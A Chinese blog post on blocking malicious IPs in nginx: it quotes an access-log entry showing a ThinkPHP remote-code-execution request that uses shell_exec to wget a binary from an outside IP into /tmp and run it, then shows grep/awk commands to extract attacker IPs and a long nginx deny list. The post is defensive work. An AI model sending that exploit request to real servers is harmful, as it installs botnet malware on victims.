找到具有明显特征的访问记录,比如:

156.203.12.198 -[/Dec/::: +] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1"   "-" "Ouija_x.86/2.0" "-"

也许是某个开源框架的漏洞,执行参数上带的方法,达到下载指定文件然后执行的目的,由于危险性,所以 shell_exec 这类函数默认在 php.ini 是禁用的。

匹配特征找出不重复的 IP,写入文件:

$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips

编辑一个 nginx 配置,加入到 location 访问中:

$ cat blockips > /etc/nginx/conf.d/blockips.conf

location / {
    include /etc/nginx/conf.d/blockips.conf
    xxxx;
}

编辑 blockips.conf,行首加 "deny ",行尾加 ";"

%s/^/deny /g

%s/$/\;/g

重载 nginx,这些 IP 访问就是403:

# 宿主机模式

$ nginx -s reload

# Docker模式

$ docker-compose restart nginx

附一份恶意访问IP:

deny 156.194.121.215;

deny 156.195.107.210;

deny 156.195.39.140;

deny 156.195.45.250;

deny 156.196.146.114;

deny 156.196.17.47;

deny 156.196.229.206;

deny 156.196.6.26;

deny 156.198.62.131;

deny 156.200.245.40;

deny 156.201.18.181;

deny 156.202.190.62;

deny 156.202.251.75;

deny 156.202.76.2;

deny 156.202.84.179;

deny 156.203.12.198;

deny 156.203.210.142;

deny 156.203.244.51;

deny 156.203.7.75;

deny 156.205.251.198;

deny 156.205.81.35;

deny 156.206.136.3;

deny 156.206.182.152;

deny 156.206.187.73;

deny 156.206.231.65;

deny 156.207.242.8;

deny 156.208.42.167;

deny 156.209.137.91;

deny 156.209.40.94;

deny 156.212.251.36;

deny 156.214.142.160;

deny 156.214.43.68;

deny 156.217.6.172;

deny 156.217.9.164;

deny 156.218.133.186;

deny 156.218.246.73;

deny 156.219.214.185;

deny 156.221.182.18;

deny 156.222.20.232;

deny 157.230.121.160;

deny 167.172.104.251;

deny 192.64.86.141;

deny 197.33.213.164;

deny 197.33.38.103;

deny 197.34.0.63;

deny 197.35.49.18;

deny 197.36.233.108;

deny 197.36.33.241;

deny 197.36.4.226;

deny 197.36.60.220;

deny 197.40.152.66;

deny 197.41.192.255;

deny 197.41.76.25;

deny 197.42.153.234;

deny 197.43.203.16;

deny 197.46.143.130;

deny 197.46.88.69;

deny 197.52.120.153;

deny 197.52.86.59;

deny 197.53.154.219;

deny 197.57.10.160;

deny 197.58.107.10;

deny 197.61.10.30;

deny 197.61.18.238;

deny 197.61.62.151;

deny 197.62.106.69;

deny 197.63.152.246;

deny 41.232.65.205;

deny 41.233.204.74;

deny 41.235.104.130;

deny 41.236.148.6;

deny 41.236.3.171;

deny 41.238.205.186;

deny 41.238.34.214;

deny 41.35.143.95;

deny 41.36.168.29;

deny 41.36.196.47;

deny 41.36.20.93;

deny 41.36.221.70;

deny 41.40.31.77;

deny 41.42.219.201;

deny 41.42.59.4;

deny 41.43.34.248;

deny 41.44.120.131;

deny 41.45.98.34;

deny 41.46.62.42;

deny 41.47.75.136;

deny 80.10.22.62;

deny 95.14.156.128;
deny 156.196.181.71;

deny 156.196.191.37;

deny 156.196.197.156;

deny 156.196.3.62;

deny 156.197.229.125;

deny 156.201.133.105;

deny 156.201.98.17;

deny 156.202.112.54;

deny 156.202.152.246;

deny 156.202.31.234;

deny 156.202.39.255;

deny 156.203.54.61;

deny 156.203.96.174;

deny 156.204.165.223;

deny 156.205.169.68;

deny 156.206.214.19;

deny 156.208.49.5;

deny 156.208.51.140;

deny 156.209.187.210;

deny 156.209.35.200;

deny 156.212.44.77;

deny 156.213.35.145;

deny 156.216.156.144;

deny 156.218.136.219;

deny 156.219.45.190;

deny 156.220.186.189;

deny 156.221.230.75;

deny 156.221.8.69;

deny 182.64.156.46;

deny 197.33.205.142;

deny 197.33.214.152;

deny 197.33.99.150;

deny 197.34.177.145;

deny 197.35.113.116;

deny 197.35.85.109;

deny 197.36.186.126;

deny 197.36.19.18;

deny 197.37.180.73;

deny 197.38.244.62;

deny 197.40.184.150;

deny 197.40.238.169;

deny 197.41.112.15;

deny 197.41.178.87;

deny 197.41.86.1;

deny 197.43.220.39;

deny 197.45.9.234;

deny 197.46.71.54;

deny 197.47.108.224;

deny 197.47.221.54;

deny 197.52.165.67;

deny 197.54.42.198;

deny 197.56.28.28;

deny 197.56.59.108;

deny 197.57.167.86;

deny 197.57.219.86;

deny 197.59.221.148;

deny 197.61.186.6;

deny 197.61.85.58;

deny 197.62.227.36;

deny 197.63.13.29;

deny 197.63.205.232;

deny 41.232.17.135;

deny 41.232.27.153;

deny 41.234.133.17;

deny 41.235.102.192;

deny 41.235.244.63;

deny 41.236.223.4;

deny 41.236.56.8;

deny 41.237.33.100;

deny 41.239.135.65;

deny 41.239.77.234;

deny 41.42.35.168;

deny 41.42.59.130;

deny 41.45.30.236;

deny 41.46.236.128;

deny 41.46.255.174;
deny 141.98.80.117;

deny 141.98.80.42;

deny 185.153.196.48;

deny 185.153.198.163;

deny 185.153.199.3;

deny 185.156.177.10;

deny 193.106.31.202;

deny 193.188.22.123;

deny 193.188.22.187;
deny 193.188.22.234;

deny 193.188.22.76;

deny 193.188.23.25;
deny 39.107.142.5;

deny 41.216.186.89;

deny 45.141.86.144;

deny 46.161.27.112;

Link:https://www.cnblogs.com/farwish/p/12080630.html

使用 Nginx 阻止恶意 IP 访问的更多相关文章

  1. 服务器安全策略之《通过IP安全策略阻止某个IP访问的设置方法》

    现在我们在布署好了一个网站,发布到外网后就意味着将会接受来自四面八方的黑客攻击,这个情况很常见,我们的网站基本上每天都要接受成千上万次的攻击,有SQL注入的.有代码注入的.有CC攻击等等...而我作为 ...

  2. nginx拒绝国外IP访问

    nginx拒绝国外IP访问方法很多,比如iptables,geoip模块,域名解析等等.这些方法不会相互冲突,可以结合起来一起使用. 今天来教大家利用两个小方法解决  域名解析禁止掉海外IP访问网站. ...

  3. Nginx 拒绝指定IP访问

    来源 : http://www.ttlsa.com/nginx/nginx-deny-ip-access/   闲来无事,登陆服务器,发现有个IP不断的猜测路径.试图往服务器上传文件(木马).于是查看 ...

  4. nginx限制恶意IP处理方法

    思考了几种方案,最终考虑使用ip黑名单的方式: 处理方法: 一.nginx黑名单方式: 1.过滤日志访问API接口的IP,统计每10分钟调用超过100次的IP,直接丢进nginx的访问黑名单 2.具体 ...

  5. Nginx禁止使用ip访问,只允许使用域名访问

    Nginx虚拟主机配置,vhosts下面有很多域名的配置: [root@external-lb01 vhosts]# pwd/data/nginx/conf/vhosts [root@external ...

  6. nginx 禁止某IP访问

    首先建立下面的配置文件放在nginx的conf目录下面,命名为blocksip.conf: deny 95.105.25.181; 保存一下. 在nginx的配置文件nginx.conf中加入:inc ...

  7. Nginx禁止使用IP访问

    在nginx的访问日志中,会出现只显示IP,而不出现域名的情况,在经过尝试之后,是因为没有设置禁止IP访问导致的. 下面就是在配置文件中设置禁止IP访问,来实现日志文件中$host显示域名. vim ...

  8. Nginx 如何限定IP访问

    在nginx.conf中的server限制段中.deny IP.表示需要限制该IP不可访问.allow IP表示权该IP可以访问. 如上图.表示阻止192.168.1.122的IP的访问.那当然也可以 ...

  9. 分享:linux系统如何快速阻止恶意IP地址

    可能你想要在各种情形下阻止有人通过IP地址访问你的Linux系统.比如说,作为最终用户,你可能想要保护自己,避免已知的间谍软件或跟踪者的IP地址.或者如果你在运行P2P软件,可能想要把来自与违反P2P ...

随机推荐

  1. Spring Cloud Task 知识点

    Spring Cloud Task的目标是为Spring Boot应用程序提供创建短期运行微服务的功能. 出处:https://blog.csdn.net/peterwanghao/article/d ...

  2. 前端jsp fetch跨域调用 is not allowed by Access-Control-Allow-Origin.

    之前我在用json跨域调用时,遇到如图问题,后来查查是官方json不支持跨域调用,后来改用非官方的jsonp跨域调用后台方法,出现如下问题 Origin http://127.0.0.1:8080 i ...

  3. dotnetcore docker 简单运行

    今天试用了下mac 版本的dotnetcore sdk,发现还是很方便的,同时官方的容器运行方式,相对小了好多 同时使用多阶段构建的方式运行dotnetcore 安装sdk 下载地址: https:/ ...

  4. [PHP]Laravel无法使用COOKIE和SESSION的解决方法

    COOKIE和SESSION的具体使用百度和官方文档上都有. 但是,文档里没有说明必须经过相应的中间件才能使用,百度搜索结果都是彼此copy的bullshit!!! 其实最终解决办法很简单,完全不是网 ...

  5. 求等差数列前$n$项和$S_n$的最值

    一.方法依据: 已知数列\(\{a_n\}\)是等差数列,首项为\(a_1\),公差为\(d\),前\(n\)项和为\(S_n\),则求\(S_n\)的最值常用方法有两种: (1).函数法:由于\(S ...

  6. day40

    session / cookies : 会话跟踪技术是Cookie与Session 会话(Session)跟踪是Web程序中常用的技术,用来跟踪用户的整个会话. Cookie通过在客户端记录信息确定用 ...

  7. Exploiting ConvNet Diversity for Flooding Identification

    语义分割洪水区域. 空洞卷积和反卷积组合,结果再用svm学习如何组合,能获得更好的效果. 直接对不同网络的结果进行投票会得到更差的结果. 消融研究(Ablation Study):类似控制变量法,就对 ...

  8. shell 字符串转数组

    #!/bin/bash string="hello,shell,split,test" #将,替换为空格 array=(${string//,/ }) for var in ${a ...

  9. SpringBoot整合MyBatis例子

    1.pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="h ...

  10. Guava Cache 参数配置说明

    系统中用到了了Guava Cache: private DriverInfoServiceImpl(DriverClientProxy driverClientProxy) { this.driver ...